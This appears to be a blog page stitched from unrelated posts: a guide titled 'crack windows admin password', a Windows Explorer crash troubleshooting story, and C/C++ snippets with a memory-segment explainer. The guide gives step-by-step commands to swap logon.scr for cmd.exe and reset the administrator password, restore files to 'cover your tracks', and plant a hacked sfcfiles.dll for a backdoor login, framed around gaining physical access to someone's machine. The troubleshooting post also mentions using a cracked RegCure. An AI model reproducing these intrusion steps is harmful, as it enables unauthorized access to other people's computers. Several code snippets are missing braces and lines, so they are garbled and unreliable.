crack windows admin password

OP here:

1. Windows XP Privilege Escalation Exploit

Here are the steps involved to Hack the Window XP Administrator Password (Windows Server 2003 Domain Admin password).

  1. Go to Start –> Run –> Type in CMD
  2. You will get a command prompt. Enter these commands the way it is given
  3. cd\
  4. cd\ windows\system32
  5. mkdir temphack
  6. copy logon.scr temphack\logon.scr
  7. copy cmd.exe temphack\cmd.exe
  8. del logon.scr
  9. rename cmd.exe logon.scr
  10. exit

Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is

Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.

So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command

net user password

Example: If the admin user name is clazh and you want change the password to pass Then type in the following command

net user administrator pass

This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.

Here are the steps involved to De Hack or restore the Window XP Administrator Passwordto cover your tracks.

  1. Go to Start –> Run –> Type in CMD
  2. You will get a command prompt. Enter these commands the way it is given
  3. cd\
  4. cd\ windows\system32\temphack
  5. copy logon.scr C:\windows\system32\logon.scr
  6. copy cmd.exe C:\windows\system32\cmd.exe
  7. exit

Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.

Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.

Update: The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.

Update: The above Method only works if the system is FAT/FAT32 – because of the updated “user rights management” in NTFS – file level rights etc. This does not work on a system using NTFS.

2. Hack Or Crack A Windows XP Administrator Password Using OphCrack

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Go to Ophcrack and download the live CD burn it to a disk and boot with it. It will depend on how strong the password is.

3. Recover The Password Using DreamPackPL

Steps to Hack into a Windows XP Computer without changing password:

  1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
  2. Download DreamPackPL http://www.d–
  3. Unzip the downloaded and you’ll get dreampackpl.ISO.
  4. Use any burning program that can burn ISO images.
  5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
  6. Press “R” to install DreamPackPL.
  7. Press “C” to install DreamPackPL by using the recovery console.
  8. Select the Windows installation that is currently on the computer (Normally is “1? if you only have one Windows installed)
  9. Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
  10. Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
  11. Type “exit”, take out disk and reboot.
  12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
  13. Click the top graphic on the DreamPack menu and you will get a menu popup.
  14. Go to commands and enable the options and enable the god command.
  15. Type “god” in the password field to get in Windows.

You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.

Note: If you are running any kind of Anti-Virus Tool it will give you a prompt saying that it is a Virus since they have already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. The DreamPackPL helps you bypass the Windows Login screen and it is not destructive.

4. Recover All Windows Password Including Vista With Login Recovery

ogin Recovery is a Online service that can help you to recover your Windows Password including Windows Vista.

There are three steps Involved

  1. Download the Login Recovery Software extraction program to create a bootable floppy disk to read the password file.
    (click here for a CD version)
  2. Insert the disk into the computer you wish to recover passwords from and boot the computer to extract the encrypted passwords to the disk.
  3. Put the disk into an Internet enabled computer, and upload the encrypted password file for decryption. (see uploads page)

This is a Paid service but Alternativly they Provide a free service which is available by waiting upto 48 hours (Only One free request every three months so be careful how you use it).

Another ways from here.

5. Offline NT Password and Registry Editor – This is a very small program, only 3MB in size, that you can burn to a CD and boot to. It’ll auto-detect the Windows installation and the account names (that is if everything was installed in the default Windows directories). Using this program you can reset or blank out a Windows password, which means it doesn’t matter how long or complicated it is. I tried this program on Vista and it would not load afterwards, so definitely only use for Windows XP or earlier!

6. John The Ripper – Another free password cracker that works on Windows, Linux and Macs, so it’s useful for any Mac or Linux user who wants to recovery a password. Pretty easy to use and comes with good instructions, so most people can follow along.

7. Knoppix STD – G4TV has a good article on another Linux distro you can download and use to crack your Windows password. Follow the detailed instructions he gives and if the password is not too long or difficult, it should be able to crack it!

Other ways from here:

8. Stellar Phoenix Password Recovery

Simple startup utility resets a forgotten admin or users’ password using a familiar Windows-like program interface instead of command-line.


Solutions: Window Explorer problem after Data Execution Prevention problem

I first got error message at startup.

“Data Execution Prevention – Windows has encountered a problem and needs to close.”

I turned off DEP for explorer.exe by going to:

System Properties->Advanced->Performance: Settings->Data Execution Prevention->”select Turn on DEP for all programs and services except those I select“, then add “explorer.exe” by browsing to C:\windows\ and select it.

Then I got another error message at startup: “Windows has encountered a problem and needs to close.” If I go to event viewer, I saw details as:

AppName: explorer.exe AppVer: 6.0.2900.5512 ModName: unknown
ModVer: Offset: 71ab6a55

I tried many things, including virus scanning and spyware removal and run “sfc /scannow“. But none seemed to work. Later the error became:

AppName: explorer.exe AppVer: 6.0.2900.5512 ModName: ws2_32.dll
ModVer: 5.1.2600.5512 Offset: 00006a55

Then I searched again. A lot “solutions” again. This is a win socket problem. I tried winsockfix 1.2from “”. It still didn’t work. But the error message seems to change a little bit from one to another. But they are all windows explorer.exe error message.

One blog says most of windows explorer problems are due to registry problem. So I download RegCure and used RegCure v1.5.2.7   Crack by Computer Angelzz. It found some problems and fixed it. But it didn’t help me fix the windows explorer problem.

Actually, the same problem has been happening in another computer of mine. So I have a feeling that this is still a virus/malware/spyware problem. But of Norton, spybot search and destroy, Ad-Aware etc, none worked. From somewhere, I read something about the W32/Autorun worm. That seems more possible. I found an application called cleanautorun and tried that. Unfortunately, it didn’t work either.

Because of the same problem in two of my computers happening at the same time, I belived it was a malware problem. I want to try more. So I searched for all top antivirus software: bitdefender, vipre, kaspersky etc. Norton, MCafee seems not the best in the list. I decided to try kaspersky since I tried it before.

Voila!!! Finally, windows explorer crash problem was fixed. Kaspersky found some kinf of w32/autorun worm.

return Reference variable

#include <iostream>

using namespace std;

int x = 1;
int & f()
return x;
int main(int argc, char *argv[])
f() = 2;


Find the largest two values in an Array

#include <iostream>
using namespace std;

void f(int y[],int x[],int N)
int i,t;


if (y[0]<y[1])

for (i=2;i<N;i++)
if (x[i]>y[0])
if (x[i]>y[1])



int i,N,y[2];
int x[]={1,6,8,5,4,3,6,7,4,0,8,15,22,77,8,22,35,21};
N = sizeof(x)/sizeof(int);
printf(“%d %d\n”,y[0],y[1]);

return 0;

counter for call function

#include <iostream>
using namespace std;

int f()

{static int i;

return ++i;


int main ()


int i,counter = 0;

for (i=0;i<10;i++)

counter = f();



return 0;



#include <iostream>

using namespace std;

int counter;

int f()




int main ()


int i;

for (i=0;i<10;i++)




return 0;


Sort Array

#include <iostream>

using namespace std;

void sort(int a[], int N)


int i,j,k,t;

for (i=0;i<N-1;i++)

for (j=i+1;j<N;j++)

if (a[j]>a[i])

{t = a[j]; a[j]=a[i]; a[i] = t;}




int i,N;

int x[]={1,6,8,5,4,3,6,7,4,0,8,15,22,77,8,22,35,21};

N = sizeof(x)/sizeof(int);


for (i=0;i<N;i++)

printf(“%d “,x[i]);



return 0;



void sort1(int a[], int N)


int i,j,k,t;

for (i=0;i<N;i++)

for (j=N-1;j>i;j–)

if (a[j]>a[j-1])

{t = a[j]; a[j]=a[j-1]; a[j-1] = t;}


Memory Allocation/Segmentation in C/C++

Explanation here:

Segment Description
Codetext segment Often referred to as the text segment, this is the area in which the executable instructions reside.  For example, Linux/Unix arranges things so that multiple running instances of the same program share their code if possible.  Only one copy of the instructions for the same program resides in memory at any time.  The portion of the executable file containing the text segment is the text section.
Initialized data – data segment Statically allocated and global data that are initialized with nonzero values live in the data segment.  Each process running the same program has its own data segment.  The portion of the executable file containing the data segment is the data section.
Uninitialized data – bss segment BSS stands for ‘Block Started by Symbol’.  Global and statically allocated data that initialized to zero by default are kept in what is called the BSS area of the process.  Each process running the same program has its own BSS area.  When running, the BSS data are placed in the data segment.  In the executable file, they are stored in the BSS section.  For Linux/Unix the format of an executable, only variables that are initialized to a nonzero value occupy space in the executable’s disk file.
Heap The heap is where dynamic memory (obtained by malloc(), calloc(), realloc() and new for C++) comes from.  Everything on a heap is anonymous, thus you can only access parts of it through a pointer. As memory is allocated on the heap, the process’s address space grows.  Although it is possible to give memory back to the system and shrink a process’s address space, this is almost never done because it will be allocated to other process again.   Freed memory (free() and delete) goes back to the heap, creating what is called holes.   It is typical for the heap to grow upward.  This means that successive items that are added to the heap are added at addresses that are numerically greater than previous items.  It is also typical for the heap to start immediately after the BSS area of the data segment.  The end of the heap is marked by a pointer known as the break. You cannot reference past the break. You can, however, move the break pointer (via brk() and sbrk() system calls) to a new position to increase the amount of heap memory available.
Stack The stack segment is where local (automatic) variables are allocated.  In C program, local variables are all variables declared inside the opening left curly brace of a function body including the main() or other left curly brace that aren’t defined as static.  The data is popped up or pushed into the stack following the Last In First Out (LIFO) rule.  The stack holds local variables, temporary information, function parameters, return address and the like.  When a function is called, a stack frame (or a procedure activation record) is created and PUSHed onto the top of the stack. This stack frame contains information such as the address from which the function was called and where to jump back to when the function is finished (return address), parameters, local variables, and any other information needed by the invoked function. The order of the information may vary by system and compiler.  When a function returns, the stack frame is POPped from the stack.  Typically the stack grows downward, meaning that items deeper in the call chain are at numerically lower addresses and toward the heap.

I tried myself using C/C++ (complier: Dev-C++

Example code:

#include <iostream>
using namespace std;

int f1;         //bss (where is data(variable&constant) stored)
int f2=0;       //bss
int f3=1;       //data
static int f4 = 0;    //bss
static int f5 = 1;    //data

int main ()
int a[2];       //stack
int b1;          //stack
int b2 = 0;     //stack
int b3 = 1;     //stack
char b5[]= “abc”;      //stack
static int c[2];      //uninitialized static, bss (initialized to 0 by default)
static int d1;         //uninitialized static, bss (initialized to 0 by default)
static int d2 = 0;     //zero initialization = uninitialized, bss
static int d3 = 1;     //nonzero init, data
static int d4 = 1;     //nonzero init, data
const int e1 = 0;      //stack
const int e2 = 1;      //stack
char *p1 = “abc”;      //p1: stack, *p1 (“abc”): data
char *p2 = “abcd”;      //p2: stack, *p2 (“abcd”): data
static int *p3 = &b1;  //p3:bss
static int *p4;  //p4:bss, *p4: 0;
int *p5 = NULL; //p5: stack, *p5: 0
static int *p6 = NULL; //p6:bss, 0
int *p7;               //p7: stack,
static char * p8 = “abc”;    //p8:data, *p8 (“abc”): data, same as *p1

int b4 = 1;
static int * p9 = &b4; //p9:bss

d1 = 1;    //d1: bss

int *p10 = (int*)malloc(sizeof(int));   //p10: stack, *p10:heap
*p10 = 1;
static char *p11 = (char*)malloc(sizeof(char)); //p11: bss, *p11:heap
*p11 = ‘a’;

printf(“Local variables:\n\n”);
printf(“int a[0]: %d (stack)\n”,a);
printf(“int a[1]: %d (stack)\n”,a+1);
printf(“int b1: %d (stack)\n”,&b1);
printf(“int b2=0: %d (stack)\n”,&b2);
printf(“int b3=1: %d (stack)\n”,&b3);

printf(“char b5[]=\”abc\”: %d (*b5 \”abc\”, stack)\n”,b5);

printf(“const int e1=0: %d (stack)\n”,&e1);
printf(“const int e2=1: %d (stack)\n”,&e2);
printf(“char * p1=\”abc\”: %d (p1, stack)\n”,&p1);
printf(“char * p2=\”abc\”: %d (p2, stack)\n”,&p2);

printf(“int * p5 = NULL: %d (p5, stack)\n”,&p5);

printf(“int * p7: %d (p7, stack)\n”,&p7);

printf(“int *p10 = (int *)malloc(int): %d (p10,stack)\n”,&p10);

printf(“static int c[0]: %d (bss)\n”,c);
printf(“static int c[1]: %d (bss)\n”,c+1);
printf(“static int d1: %d (bss)\n”,&d1);
printf(“static int d2=0: %d (bss)\n”,&d2);

printf(“static int * p3 = &b1: %d (p3, bss)\n”,&p3);
printf(“static int * p4: %d (p4, bss)\n”,&p4);

printf(“static int * p6 = NULL: %d (p6, bss)\n”,&p6);

printf(“static int * p9 = &b4, b4=1: %d (p9, bss)\n”,&p9);

printf(“d1 = 1: %d (bss)\n”,&d1);

printf(“static int *p11 = (int*)malloc(int): %d (p11,bss)\n”,&p11);

printf(“static int d3=1: %d (data)\n”,&d3);
printf(“static int d4=1: %d (data)\n”,&d4);

printf(“static char * p8 = \”abc\”: %d (p8, data)\n”,&p8);

printf(“char * p1=\”abc\”: %d (*p1 \”abc\”, data)\n”,p1);
printf(“static char * p8 = \”abc\”: %d (*p8 \”abc\”, data)\n”,p8);
printf(“char * p2=\”abcd\”: %d (*p2 \”abcd\”, data)\n”,p2);

printf(“static int * p4: %d (*p4, 0)\n”,p4);
printf(“int * p5 = NULL: %d (*p5, 0)\n”,p5);


printf(“int *p10 = (int *)malloc(int): %d (*p10:1,Heap)\n”,p10);

printf(“static char *p11 = (int*)malloc(int): %d (*p11:’a’,Heap)\n”,p11);

printf(“\n\nGlobal variables:\n”);
printf(“int f1: %d (bss)\n”,&f1);
printf(“int f2=0: %d (bss)\n”,&f2);

printf(“static int f4: %d (bss)\n”,&f4);

printf(“int f3=1: %d (data)\n”,&f3);

printf(“static int f5=1: %d (data)\n”,&f5);

return 0;



Local variables:

int a[0]: 2359152 (stack)
int a[1]: 2359156 (stack)
int b1: 2359148 (stack)
int b2=0: 2359144 (stack)
int b3=1: 2359140 (stack)
char b5[]=”abc”: 2359136 (*b5 “abc”, stack)
const int e1=0: 2359132 (stack)
const int e2=1: 2359128 (stack)
char * p1=”abc”: 2359124 (p1, stack)
char * p2=”abc”: 2359120 (p2, stack)
int * p5 = NULL: 2359116 (p5, stack)
int * p7: 2359112 (p7, stack)

int *p10 = (int *)malloc(int): 2359104 (p10,stack)

static int c[0]: 4468840 (bss)
static int c[1]: 4468844 (bss)
static int d1: 4468856 (bss)
static int d2=0: 4468872 (bss)
static int * p3 = &b1: 4468888 (p3, bss)
static int * p4: 4468904 (p4, bss)
static int * p6 = NULL: 4468920 (p6, bss)
static int * p9 = &b4, b4=1: 4468936 (p9, bss)
d1 = 1: 4468856 (bss)
static int *p11 = (int*)malloc(int): 4468952 (p11,bss)

static int d3=1: 4452360 (data)
static int d4=1: 4452364 (data)

static char * p8 = “abc”: 4452368 (p8, data)
char * p1=”abc”: 4456448 (*p1 “abc”, data)
static char * p8 = “abc”: 4456448 (*p8 “abc”, data)
char * p2=”abcd”: 4456452 (*p2 “abcd”, data)

static int * p4: 0 (*p4, 0)
int * p5 = NULL: 0 (*p5, 0)

int *p10 = (int *)malloc(int): 212064 (*p10:1,Heap)
static char *p11 = (int*)malloc(int): 212168 (*p10:’a’,Heap)

Global variables:
int f1: 4468752 (bss)
int f2=0: 4468756 (bss)
static int f4: 4468776 (bss)

int f3=1: 4452352 (data)
static int f5=1: 4452356 (data)